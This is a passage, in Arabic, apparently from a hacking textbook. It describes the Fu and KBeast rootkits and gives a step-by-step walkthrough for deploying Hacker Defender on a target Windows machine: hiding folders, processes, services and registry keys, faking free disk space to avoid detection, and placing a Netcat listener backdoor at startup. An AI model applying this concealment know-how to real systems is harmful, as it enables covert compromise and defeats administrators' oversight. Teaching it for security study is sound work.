‫ﯾﻣﻛن ‪ Rootkit: Fu‬أﯾﺿﺎ إﺧﻔﺎء وﺳرد ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺎت وﺑراﻣﺞ اﻟﺗﺷﻐﯾل )‪ (drivers‬ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت ‪ Hooking‬اﻟﻣﺧﺗﻠﻔﺔ‪ .‬ﯾﻣﻛﻧك أﯾﺿﺎ‬
‫إﺿﺎﻓﺔ أي ﻣن اﻻﻣﺗﯾﺎزات ﻷي ﻣن اﻟﻌﻣﻠﯾﺎت‪ .‬ھذا ﯾﻣﻛن أن ﯾؤدي اﻟﻌدﯾد ﻣن اﻹﺟراءات ﻓﻲ ‪ the Windows event viewer‬وﺗظﮭر ﻛﺄﻧﮭﺎ‬
‫ﺷﺧص آﺧر‪.‬‬

‫‪Rootkit: KBeast‬‬
‫)‪ KBeast (Kernel Beast‬ھو ‪ kernel rootkit‬واﻟذي ﯾﻘوم ﺑﺗﺣﻣﯾل ﻧﻔﺳﮫ ﻛﺎﻧﮫ وﺣدة ﻛﯾرﻧل )‪ .(kernel module‬ﯾدﻋم إﺻدارات‬
‫اﻟﻛﯾرﻧل ‪ .2.6.35 ,2.6.32 ,2.6.18 ,2.6.16‬ﯾوﻓر اﻟوﺻول ﻋن ﺑﻌد إﻟﻰ اﻷﻧظﻣﺔ ﺑﺎﺳﺗﺧدام ﻋﻧﺻر ‪ .userland component‬ﺑﺎﺳﺗﺧدام‬
‫وﺣدة اﻟﻧواة )اﻟﻛﯾرﻧل(‪ ،‬ﯾﻣﻛن أن ﯾﺻﺑﺢ ‪ userland backdoor component‬ﻏﯾر ﻣرﺋﻲ ﺑﺎﻟﻧﺳﺑﺔ ﻟﺗطﺑﯾﻘﺎت ‪ userland‬اﻷﺧرى‪ .‬ھذا‬
‫ﯾﻣﻛﻧﮫ إﺧﻔﺎء اﻟﻣﻠﻔﺎت‪ ،‬واﻟﻣﺟﻠدات‪ ،‬واﻟﻌﻣﻠﯾﺎت )‪ (ps, pstree, top, lsof‬اﻟﺗﻲ ﺗﺑدأ ﻣﻊ اﻟﻘﯾم اﻟﻣﻌرﻓﺔ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم‪ .‬ﯾﻣﻛﻧك اﺳﺗﺧدام ﻗدرات‬
‫ال ‪ Keylogging‬ﻻﻟﺗﻘﺎط أﻧﺷطﺔ اﻟﻣﺳﺗﺧدم‪ .‬ﻟﺗﻧﻔﯾذ واﺟﮭﺔ ‪ netstat‬ﻓﻲ ‪ KBeast ،userland‬ﯾﺣﺻل ﻋﻠﻰ اﻟوﺻول اﻟﻰ اﻟﻧظﺎم ﻣن ﺧﻼل‬
‫اﺻطﯾﺎد )‪ (hocking‬ﺟدول اﺳﺗدﻋﺎءات اﻟﻧظﺎم وھﯾﺎﻛل اﻟﻌﻣﻠﯾﺎت‪.‬‬

‫ﻧﺟد اﻧﻧﺎ اﺳﺗﺧدﻣﻧﺎ اﻟﻣﺻطﻠﺢ ‪ userland‬ﻛﺛﯾرا ﻓﻣﺎ ھوا؟‬


‫ﺣﯾث ﻧﺟد ان اﻟﺗطﺑﯾﻘﺎت ﺗﻧﻘﺳم اﻟﻰ ﻧوﻋﯾن ﻧوع ﯾﻌﻣل ﻋﻠﻰ ﻣﺳﺗوى اﻟﻛﯾرﻧل وﻧوع ﯾﻌﻣل ﻋﻠﻰ ﻣﺳﺗوى اﻟﻣﺳﺗﺧدم وﻻ ﯾﺗﻌﺎﻣل ﻣﻊ اﻟﻛﯾرﻧل ﻣﺑﺎﺷرة‬
‫وھذا ﻣﺎ ﯾﺳﻣﻰ ‪ userland‬وﻗد ﻧﺟد ان ﻓﻲ ﺑﻌض اﻟﺗطﺑﯾﻘﺎت اﻟواﺣدة ﺗﺷﻣل اﻟﻧوﻋﯾن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪441‬‬

‫ﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن اﻟﻣﻣﯾزات اﻟﺗﻲ ﯾﻣﻛن ان ﯾﻘوم ﺑﮭﺎ ‪ KBeast‬ﻛﺎﻻﺗﻰ‪:‬‬


‫‪ Hiding this loadable kernel module -‬ﯾﻘوم ﺑﺈﺧﻔﺎء وﺣدات اﻟﻛﯾرﻧل اﻟذى ﻗﺎم ﺑﺗﺣﻣﯾﻠﮭﺎ‪.‬‬
‫‪ Hiding files/directory -‬ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات‪.‬‬
‫‪ Hiding process (ps, pstree, top, lsof) -‬ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﻌﻣﻠﯾﺎت‪.‬‬
‫‪ Hiding socket and connections (netstat, lsof) -‬ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﺳوﻛﯾت واﻻﺗﺻﺎﻻت‪.‬‬
‫‪ Keystroke logging to capture user activity -‬ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻟﺗﺳﺟﯾل أﻧﺷطﺔ اﻟﻣﺳﺗﺧدﻣﯾن‪.‬‬
‫‪ Anti-kill process -‬ﻟﻣﻧﻊ ﻏﻠﻖ اﻟﺗطﺑﯾﻘﺎت ﺑﺎﻟﻘوة‪.‬‬
‫‪ Anti-remove file -‬ﻟﻣﻧﻊ ﺣذف اﻟﻣﻠﻔﺎت ﺑﺎﻟﻘوة‪.‬‬
‫‪ Anti-delete this loadable kernel modules -‬ﻣﻧﻊ ﺣذف وﺣدات اﻟﻛﯾرﻧل ﺑﺎﻟﻘوة‪.‬‬
‫‪Local root escalation backdoor -‬‬
‫‪ Remote binding backdoor hidden by the kernel rootkit -‬اﻻﺗﺻﺎل ﻋن ﺑﻌد ب ‪ backdoor‬اﻟﻣﺧﺑﺄ ﺑواﺳطﺔ اﻟروت ﻛت‪.‬‬

‫‪Hacker Defender: It is Not What You Think‬‬

‫أول اﻷﺷﯾﺎء؛ ﻻ ﺗدع اﻻﺳم ﯾﺧدﻋك‪ Hacker Defender ،‬ھو ‪ .rootkit‬أﻧﮭﺎ ﻟﯾﺳت وﺳﯾﻠﺔ ﻟﻠدﻓﺎع ﻋن اﻟﻣﺗﺳﻠﻠﯾن! ‪Hacker Defender‬‬
‫ھو ‪ rootkit‬ﺧﺎص ﺑﺎﻟوﯾﻧدوز واﻟﺗﻲ ھﻲ ﺳﮭﻠﺔ ﻧﺳﺑﯾﺎ ﻻﻓﮭم واﻻﻋداد‪ Hacker Defender .‬ھو وﯾﻧدوز روت ﻛﯾت‪ ،‬وھذا ﯾﻌﻧﻲ أﻧك ﺳوف‬
‫ﺗﺣﺗﺎج إﻟﻰ ﻧﺷرھﺎ ﻋﻠﻰ ﺟﮭﺎز وﯾﻧدوز‪ .‬ﺳوف ﺗﺣﺗﺎج أﯾﺿﺎ إﻟﻰ اﻟﺑﺣث ﻓﻲ اﻹﻧﺗرﻧت ﻟﻠﺣﺻول ﻋﻠﻰ ﻧﺳﺧﺔ ﻣن ‪ ،Hacker Defender‬ﻣن‬
‫اﻟﻣؤﻛد ﯾﺟب أن ﺗﻛون أﻛﺛر ﺣذرا ﻋﻧد ﺗﻧزﯾل وﺗرﻛﯾب اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ ﻋﻣدا)‪! (malware program‬‬

‫ھﻧﺎك ﺛﻼﺛﺔ ﻣﻠﻔﺎت رﺋﯾﺳﯾﺔ ﻣﺗﺿﻣﻧﺔ ﻓﻲ ‪ Hacker Defender‬اﻟﺗﻲ ﯾﺟب أن ﺗﻛون ﻋﻠﻰ ﻋﻠم‪،hxdef100.ini ،hxdef100.exe :‬‬
‫و‪ .bdcli100.exe‬ﻋﻠﻰ اﻟرﻏم ﻣن أن اﻟﻣﻠف ﻣﺿﻐوط‪ .‬ﺳﯾﺗﺿﻣن اﻟﻌدﯾد ﻣن اﻟﻣﻠﻔﺎت اﻷﺧرى‪ ،‬ﺳﻧرﻛز اھﺗﻣﺎﻣﻧﺎ ﻋﻠﻰ اﻟﻣﻠﻔﺎت اﻟﺛﻼﺛﺔ ھذه‪.‬‬
‫‪ Hxdef100.exe‬ھو اﻟﻣﻠف اﻟﻘﺎﺑل ﻟﻠﺗﻧﻔﯾذ اﻟذي ﯾدﯾر ‪ Hacker Defender‬ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف‪ Hxdef100.ini .‬ھو ﻣﻠف اﻻﻋداد‬
‫ﺣﯾث ﻣن ﺧﻼﻟﮫ ﯾﻣﻛن إﻧﺷﺎء اﻟﺧﯾﺎرات اﻟﺗﻲ ﻧرﯾد اﺳﺗﺧداﻣﮭﺎ وﻗﺎﺋﻣﺔ اﻟﺑراﻣﺞ أو اﻟﻣﻠﻔﺎت أو اﻟﺧدﻣﺎت اﻟﺗﻲ ﻧرﯾد أن إﺧﻔﺎﺋﮭﺎ‪ Bdcli100.exe .‬ھو‬
‫ﺑرﻧﺎﻣﺞ اﻟﻌﻣﯾل اﻟذي ﯾﺳﺗﺧدم ﻟﻼﺗﺻﺎل ﻣﺑﺎﺷرة ﻣﻊ ‪ backdoor‬اﻟﺧﺎص ب ‪.Hacker Defender‬‬
‫ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﺗﺣﻣﯾل اﻟﻣﻠف ‪ hxdef100.zip‬إﻟﻰ اﻟﮭدف اﻟﺧﺎص ﺑك‪ ،‬ﻓﺈﻧك ﺗﺣﺗﺎج إﻟﻰ ﻓك اﻟﺿﻐط ﻋﻠﯾﮫ‪ .‬ﻹﺑﻘﺎء اﻻﻣور ﺑﺳﯾطﺔ ﻗدر‬
‫اﻹﻣﻛﺎن‪ ،‬ﻓﻣن اﻷﻓﺿل إﻧﺷﺎء ﻣﺟﻠد واﺣد ﻋﻠﻰ ﺟذر ﻣﺣرك اﻷﻗراص اﻟﮭدف اﻟﺑﺎرﺗش اﻟذي ﯾﺣﻣل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز )‪.(partition C‬‬
‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﺳوف ﻧﻘوم ﺑﺈﻧﺷﺎء ﻣﺟﻠد ﻋﻠﻰ اﻟﻣﺣرك )\‪(C:‬ﯾدﻋﻰ “‪ .(for rootkit) ”rk‬ﯾﺗم وﺿﻊ ﻛﺎﻓﺔ اﻟﻣﻠﻔﺎت ﺑﻣﺎ ﻓﻲ ذﻟك‬
‫‪ hxdef100.zip‬وﻣﺣﺗوﯾﺎﺗﮫ اﻟﻐﯾر ﻣﺿﻐوطﺔ داﺧل ھذا اﻟﻣﺟﻠد‪ .‬ھذا ﺳﯾﺟﻌل ﻣن اﻻﺳﮭل ﺗﺗﺑﻊ اﻟﻣﻠﻔﺎت‪ ،‬وﺗوﻓﯾر ﻣوﻗﻊ ﻣرﻛزي ﻟﺗﺣﻣﯾل أدوات‬
‫إﺿﺎﻓﯾﺔ‪ ،‬وﺟﻌل إﺧﻔﺎء ھذا اﻟﻣﺳﺗودع اﻟﻣرﻛزي أﺳﮭل ﺑﻛﺛﯾر‪ .‬وﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﻓك ﺿﻐط ﻣﻠف ‪ ،hxdef100‬ﯾﻣﻛﻧك أن ﺗﺑدأ ﻓﻲ إﻋداد‬
‫‪ Hacker Defender‬ﻋن طرﯾﻖ ﺗﻌدﯾل اﻟﻣﻠف ‪.hxdef100.ini‬‬
‫ﺑﻣﺟرد ﻓﺗﺢ اﻟﻣﻠف ‪ ،.ini‬ﺳﺗرى ﻋدد ﻣن اﻷﻗﺳﺎم اﻟﻣﺧﺗﻠﻔﺔ‪ .‬ﯾﺑدأ ﻛل ﻗﺳم رﺋﯾﺳﻲ ﻣﻊ اﺳم ﻣﻐﻠﻖ ﻓﻲ ﻗوس ﻣرﺑﻊ‪ .‬وﯾﺑﯾن اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻣﺛﺎل ﻟﻣﻠف‬
‫اﻟﺗﻛوﯾن‪/‬اﻻﻋداد اﻻﻓﺗراﺿﻲ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪442‬‬

‫ﻛﻣﺎ ﺗرون ﻣن اﻟﺷﻛل اﻟﺳﺎﺑﻖ‪ ،‬ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟﻌﻧﺎوﯾن ﺑﻣﺎ ﻓﻲ ذﻟك ]اﻟﺟدول ﻣﺧﻔﻲ)‪] ،[ (hidden table‬اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ )‪(hidden process‬‬
‫[‪] ،‬ﻋﻣﻠﯾﺎت اﻟﺟذر)‪] ،[ (root process‬اﻟﺧدﻣﺎت اﻟﻣﺧﻔﯾﺔ)‪ ،[ (hidden services‬وﻏﯾرھﺎ‪ .‬ﺳﺗﻼﺣظ أﯾﺿﺎ أن ﻣﻠف ﺗﻛوﯾن ‪Hacker‬‬
‫‪ Defender‬ﯾﺗﺿﻣن زوﺟﯾن ﻣن اﻹدﺧﺎﻻت اﻻﻓﺗراﺿﯾﺔ‪ .‬ﺗﺳﺗﺧدم ھذه اﻹدﺧﺎﻻت ﻹﺧﻔﺎء ﻣﻠﻔﺎت ‪ Hacker Defender‬واﻟﺗﻲ ﺑﻧﯾت ﻓﻲ‬
‫‪ backdoor‬ﻟذﻟك ﻟم ﯾﻛن ﻟدﯾك ﻟﺗﻌدﯾل ھذه أو إﺟراء ﺗﻐﯾﯾرات إﺿﺎﻓﯾﺔ‪ .‬ﻻﺣظ أﯾﺿﺎ أن اﻟﻣﻠف ‪ ini‬ﯾدﻋم اﺳﺗﺧدام أﺣرف ‪ wildcards‬ﻣﻊ‬
‫اﻟﺣرف "*"‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬أي اﻟﻣﻠف ﯾﺑدأ ﺑﺎﻟﺣروف ‪ hxdef‬ﺳﯾﺗم إﺿﺎﻓﺗﮫ ﺗﻠﻘﺎﺋﯾﺎ اﻟﻰ اﻟﻘﺎﺋﻣﺔ‪.‬‬

‫طرﯾﻘﺔ اﻟﻌﻣل ﺑداﯾﺔ ﻣن اﻟﺟزء اﻟﻌﻠوي ﻣن ﺧﻼل ﻛل اﻟﻌﻧﺎوﯾن‪ .‬ﯾﺣﻣل ﻋﻧوان اﻟﻘﺳم اﻷول ]اﻟﺟدول اﻟﻣﺧﻔﻲ)‪ .[ (hidden table‬أي ﻣن اﻟﻣﻠﻔﺎت‬
‫أو اﻟﻣﺳﺎرات أو اﻟﻣﺟﻠدات اﻟﻣدرﺟﺔ ﻓﻲ إطﺎر ھذا اﻟﺑﻧد ﺳوف ﺗﻛون ﻣﺧﻔﯾﺔ ﻣن اﻟﻣﺳﺗﻛﺷف )‪ (explorer‬وﻣدﯾر اﻟﻣﻠﻔﺎت )‪(file manager‬‬
‫اﻟﻣﺳﺗﺧدﻣﺔ ﻣن ﻗﺑل ‪ .Windows‬إذا ﻗﻣت ﺑﺈﻧﺷﺎء ﻣﺟﻠد ﻋﻠﻰ ﺟذر ﻣﺣرك اﻷﻗراص ﻛﻣﺎ اﻗﺗرح ﻓﻲ وﻗت ﺳﺎﺑﻖ‪ ،‬ﺗﺄﻛد ﻣن إدراﺟﮫ ھﻧﺎ‪ .‬ﺑﻧﺎء ﻋﻠﻰ‬
‫اﻟﻣﺟﻠد اﻟذي ﻗﻣﻧﺎ ﺑﺈﻧﺷﺎﺋﮫ ﻓﻲ اﻟﻣﺛﺎل اﻟﺳﺎﺑﻖ‪ ،‬ﻓﺳوف ﻧﻘوم ﺑﺈدراج "‪ " rk‬ﻓﻲ اﻟﻣﻘطﻊ ]اﻟﺟدول اﻟﻣﺧﻔﻲ)‪.[ (hidden table‬‬

‫ﻓﻲ اﻟﻣﻘطﻊ ]اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ )‪ ،[ (hidden process‬ﺳوف ﺗﻘوم ﺑﺳرد ﻗﺎﺋﻣﺔ ﻛل ﻣن اﻟﻌﻣﻠﯾﺎت أو اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗرﯾد أن ﺗﻛون ﻣﺧﺑﺄة ﻋن‬
‫اﻟﻣﺳﺗﺧدم‪ .‬ﻛل ﻣن اﻟﻌﻣﻠﯾﺎت اﻟﻣذﻛورة ھﻧﺎ ﺳوف ﺗﻛون ﻣﺧﻔﯾﺔ ﻋن اﻟﻣﺳﺗﺧدم اﻟﻣﺣﻠﻲ ﻋﻧد ﻋرض اﻟﻌﻣﻠﯾﺎت ﻗﯾد اﻟﺗﺷﻐﯾل ﺣﺎﻟﯾﺎ ﻣﻊ ﻣدﯾر اﻟﻣﮭﻣﺎت‬
‫)‪ .(task manager‬ﻛﻣﺛﺎل‪ ،‬ﻧﻔﺗرض أﻧك ﺗرﯾد إﺧﻔﺎء ﺑرﻧﺎﻣﺞ اﻵﻟﺔ اﻟﺣﺎﺳﺑﺔ‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﺳوف ﺗﺣﺗﺎج ﻟﺳرد ﺑرﻧﺎﻣﺞ اﻟﺣﺎﺳﺑﺔ ﺗﺣت اﻟﻣﻘطﻊ‬
‫]اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ )‪ .[ (hidden process‬ﺑﺈﺿﺎﻓﺔ ‪ calc.exe‬إﻟﻰ اﻟﻣﻘطﻊ ]اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ )‪ ،[ (hidden process‬ﻓﺈن اﻟﻣﺳﺗﺧدم ﻟن ﯾﻛون‬
‫ﻗﺎدرا ﻋﻠﻰ اﻟﻌﺛور أو اﻟﺗﻔﺎﻋل ﻣﻊ ﺑرﻧﺎﻣﺞ اﻵﻟﺔ اﻟﺣﺎﺳﺑﺔ‪ .‬ﺑﻣﺟرد ﺑدء ‪ rootkit‬ﻟدﯾﻧﺎ‪ ،‬ﻓﻠن ﯾوﺟد أي ﺑرﻧﺎﻣﺞ آﻟﺔ ﺣﺎﺳﺑﺔ ﻣﺗوﻓرة ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪.‬‬

‫ﯾﺳﺗﺧدم اﻟﻘﺳم ]ﻋﻣﻠﯾﺎت اﻟﺟذر)‪ ،[ (root process‬ﻟﻠﺳﻣﺎح ﻟﺑراﻣﺞ ﻣﻌﯾﻧﮫ ﻟﻠﺗﻔﺎﻋل ﻣﻊ وﻋرض اﻟﻣﺟﻠدات واﻟﻌﻣﻠﯾﺎت اﻟﻣﺧﻔﯾﺔ ﺳﺎﺑﻘﺎ‪ .‬ﺗذﻛر أﻧﮫ ﻓﻲ‬
‫اﻷﺟزاء اﻟﺳﺎﺑﻘﺔ‪ ،‬ﻛﻧﺎ ﻗد ازاﻟﻧﺎ ﻗدرة ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻟﻠﻛﺷف ﻋن‪ ،‬اﻟﻧظر‪ ،‬واﻟﺗﻔﺎﻋل ﻣﻊ ﻣﺧﺗﻠف اﻟﻣﻠﻔﺎت واﻟﺑراﻣﺞ‪ .‬ﻓﻲ ھذا اﻟﻘﺳم‪ ،‬ﻧﻘوم ﺑﺳرد‬
‫ﻗﺎﺋﻣﺔ اﻟﺑراﻣﺞ اﻟﺗﻲ ﻧرﯾدھﺎ ان ﺗﺣﺻل ﻋﻠﻰ اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ‪ .‬ﺑﺣﯾث ﯾﺳﻣﺢ ﻟﻠﺑراﻣﺞ اﻟﻣذﻛورة ھﻧﺎ ﻟﻣﺷﺎھدة واﻟﺗﻔﺎﻋل ﻣﻊ ﺑراﻣﺞ ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬ﺑﻣﺎ‬
‫ﻓﻲ ذﻟك ﺗﻠك اﻟواردة ﻓﻲ ]اﻟﺟدول اﻟﻣﺧﻔﻲ)‪ [ (hidden table‬و ]اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ )‪.[ (hidden process‬‬

‫إذا ﻛﺎن ﻟدﯾك أي ﻣن اﻟﺑراﻣﺞ اﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ اﻟﺗﺛﺑﯾت ﻛﺧدﻣﺔ أو ﺗﺷﻐﯾل اﻟﺧدﻣﺎت ﻣﺛل ﺑروﺗوﻛول ﻧﻘل اﻟﻣﻠﻔﺎت‪ ،‬ﺧوادم اﻟﺷﺑﻛﺔ‪،backdoor ،‬‬
‫وﻣﺎ إﻟﻰ ذﻟك‪ ،‬ﻓﺳوف ﺗﺣﺗﺎج إﻟﻰ إدراﺟﮭﺎ ﻓﻲ اﻟﻘﺳم ]اﻟﺧدﻣﺎت اﻟﻣﺧﻔﯾﺔ)‪ .[ (hidden services‬ﻣﺛل ﻛل اﻷﻗﺳﺎم أﺧرى‪ ،‬ﻓﺈن اﻟﻘﺳم ]اﻟﺧدﻣﺎت‬
‫اﻟﻣﺧﻔﯾﺔ[ ﯾﻘوم ﺑﺈﺧﻔﺎء ﻛل ﻣن اﻟﺧدﻣﺎت اﻟﻣذﻛورة‪ .‬ﻣرة أﺧرى‪ ،‬ﻋﻧد اﻟﺗﻌﺎﻣل ﻣﻊ ﻣدﯾر اﻟﻣﮭﻣﺎت)‪ ، (task manger‬ﺳﯾﺗم أﺧﻔﺎء أي ﻣن اﻟﺑرﻧﺎﻣﺞ‬
‫اﻟﻣذﻛورة ھﻧﺎ ﻣن "ﻗﺎﺋﻣﺔ اﻟﺧدﻣﺎت"‪.‬‬

‫ﯾﻣﻛﻧك اﺳﺗﺧدام ]‪ [Hidden REGKEYS‬ﻹﺧﻔﺎء ﻣﻔﺎﺗﯾﺢ ﺗﺳﺟﯾل )‪ (REGKEY‬ﻣﻌﯾﻧﺔ‪ .‬ﺗﻘرﯾﺑﺎ ﺟﻣﯾﻊ ﺑراﻣﺞ إﻧﺷﺎء ﻣﻔﺎﺗﯾﺢ اﻟﺗﺳﺟﯾل ﻋﻧد‬
‫ﺗرﻛﯾﺑﮭﺎ أو ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻗﺳم ]‪ [Hidden REGKEYS‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء ﻛل ﻣن ھذه اﻟﻣﻔﺎﺗﯾﺢ‪ .‬وﺳوف ﺗﺣﺗﺎج إﻟﻰ‬
‫اﻟﺗﺄﻛد ﻣن ذﻛرھﺎ ﺟﻣﯾﻌﺎ ﻣن أﺟل ﺗﺟﻧب اﻟﻛﺷف‪.‬‬
‫ﺑﻌض اﻟﺣﺎﻻت ﺗﺗطﻠب ﺳﯾطرة أﻛﺛر ﻣن ﻣﺟرد إﺧﻔﺎء ﻣﻔﺎﺗﯾﺢ ﺑﺄﻛﻣﻠﮫ‪ .‬إذا ﻛﺎن اﻟﻣﻔﺗﺎح ﻣﻔﻘود )أو ﻣﺧﻔﻰ(‪ ،‬ﻓﺎن ﻣﺳؤول اﻟﻧظﺎم ﻗد ﯾﺷﺗﺑﮫ ﻓﻲ ذﻟك‪.‬‬
‫ﻟﻠﺗﻌﺎﻣل ﻣﻊ ھذه اﻟﺣﺎﻻت‪ ،‬ﻓﺎن ‪ Hacker Defender‬ﯾﺳﻣﺢ ﻟﻧﺎ ﺑﺎﺳﺗﺧدام اﻟﻘﺳم ]‪ [Hidden RegValues‬وھذا ﺳوف ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﻘﯾم‬
‫اﻟﻔردﯾﺔ ﺑدﻻ ﻣن اﻟﻣﻔﺗﺎح ﺑﺄﻛﻣﻠﮫ‪.‬‬

‫اﻟﻘﺳم ]‪ [Startup Run‬ھﻲ ﻗﺎﺋﻣﺔ اﻟﺑراﻣﺞ اﻟﺗﻲ ﺳوف ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﺗﻠﻘﺎﺋﯾﺎ ﺑﻣﺟرد ﺑدأ ‪ .Hacker Defender‬وھذا ﺳﯾﻛون ﻣﻛﺎﻧﺎ ﺟﯾدا ﻟﺳرد‬
‫اﻷﻣر ‪ Netcat‬ﻟو ﻛﻧت ﻣﮭﺗﻣﺎ ﺑﺈﻧﺷﺎء ﻣﺟﻣوﻋﺔ ‪ .backdoor‬ﻓﻘط ﺗﺄﻛد ﻣن وﺿﻌﮫ ﻓﻲ وﺿﻊ اﻟﻣﺳﺗﻣﻊ)‪. (Listener mode‬‬

‫ﺗﻣﺎﻣﺎ ﻣﺛل ﺗﺛﺑﯾت اﻟﺑراﻣﺞ ﻋﻠﻰ ﺟﮭﺎز وﯾﻧدوز واﻟﺗﻲ ﺗﻘوم ﺗﻠﻘﺎﺋﯾﺎ ﺑﺈﻧﺷﺎء ﻣﻔﺎﺗﯾﺢ اﻟﺗﺳﺟﯾل واﻟﻘﯾم‪ ،‬ﺗرﻛﯾب اﻟﺑراﻣﺞ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف ﯾﺗطﻠب‬
‫ﻣﺳﺎﺣﺔ ﻋﻠﻰ اﻟﻘرص اﻟﺻﻠب‪ .‬ھﻧﺎ ﻣرة أﺧرى‪ ،‬ﻣﺳؤول اﻟﻧﺎظم ﯾﻣﻛﻧﮫ أن ﯾﻼﺣظ إذا ﻗﻣت ﺑﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﯾﺗطﻠب اﻟﻛﺛﯾر ﻣن ﻣﺳﺎﺣﺔ اﻟﻘرص‪ .‬إذا‬
‫ﻛﺎن اﻟﻣﺳﺗﺧدم ﯾﺑدأ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﮫ ﻓﻲ ﺻﺑﺎح أﺣد اﻷﯾﺎم وﯾﻛﺗﺷف أن أﻛﺛر ﻣن ﻧﺻف ﻣﺳﺎﺣﺔ اﻟﻘرص اﻟﺻﻠب ﻓﺟﺄة ﺗم اﺳﺗﺧداﻣﮭﺎ‪،‬‬
‫ﻓﺎن ھذا ﺳوف ﯾﺛﯾر ﺑﻌض اﻟﺷﺑﮭﺎت ﻟدﯾﮫ‪ .‬ﯾﻣﻛﻧك اﺳﺗﺧدام اﻟﻣﻘطﻊ ]‪ [Free Space‬ﻟدﻓﻊ اﻟﻛﻣﺑﯾوﺗر إﻟﻰ " إﺿﺎﻓﺔ ﻣرة أﺧرى " ﻛﻣﯾﺔ اﻟﻣﺳﺎﺣﺔ‬
‫اﻟﺣرة اﻟﺗﻲ ﺗم اﺳﺗﺧدﻣﺗﮭﺎ‪ .‬ﺑﺣﯾث إدﺧﺎل رﻗم ھﻧﺎ ﺳوف ﯾﻔرض ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺑﺎﻹﺑﻼغ ﻋن اﻟﻣﺳﺎﺣﺔ اﻟﺣرة اﻟﻣﺗوﻓرة اﻟﻔﻌﻠﯾﺔ ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ اﻟرﻗم‬
‫اﻟذي ﻗﻣت ﺑﺈدﺧﺎﻟﮫ ﻓﻲ ھذا اﻟﻘﺳم‪ .‬ﺑﻌﺑﺎرة أﺧرى‪ ،‬إذا ﻗﻣت ﺑﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﯾﺗطﻠب ‪ 1‬ﻏﯾﻐﺎﺑﺎﯾت ﻣن اﻟﻣﺳﺎﺣﺔ اﻟﺣرة‪ ،‬ﻓﺈﻧك ﯾﺟب أن ﺗﺿﯾف‬
‫‪ 1073741824‬ﻓﻲ اﻟﻘﺳم ]‪ .[Free Space‬وﺑذﻟك ﯾﻘﻠل ﻣن اﺣﺗﻣﺎل اﻻﻛﺗﺷﺎف‪ .‬ﯾرﺟﻰ ﻣﻼﺣظﺔ أن ﯾﺗم ﺳرد ھذا اﻟرﻗم ﻓﻲ ﺻورة ﺑﺎﯾت‪ .‬إذا‬
‫ﻛﻧت ﺑﺣﺎﺟﺔ إﻟﻰ ﻣﺳﺎﻋدة ﻓﻲ ﺗﺣوﯾل اﻟﻣﺳﺎﺣﺔ ﻣن ﺑﺎﯾت إﻟﻰ ﻛﯾﻠو ﺑﺎﯾت إﻟﻰ ﻏﯾﻐﺎ ﺑﺎﯾت ﻣﯾﻐﺎ ﺑﺎﯾت‪ ،‬ﻓﮭﻧﺎك اﻟﻌدﯾد ﻣن اﻵﻻت اﻟﺣﺎﺳﺑﺔ اﻟﺟﯾدة‬
‫اﻟﻣﺗﺎﺣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ .‬ﺑﺑﺳﺎطﺔ ﺟوﺟل " ﺣﺎﺳﺑﺔ ﻛﯾﻠو ﺑﺎﯾت إﻟﻰ ﻣﯾﻐﺎﺑﺎﯾت "‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪443‬‬

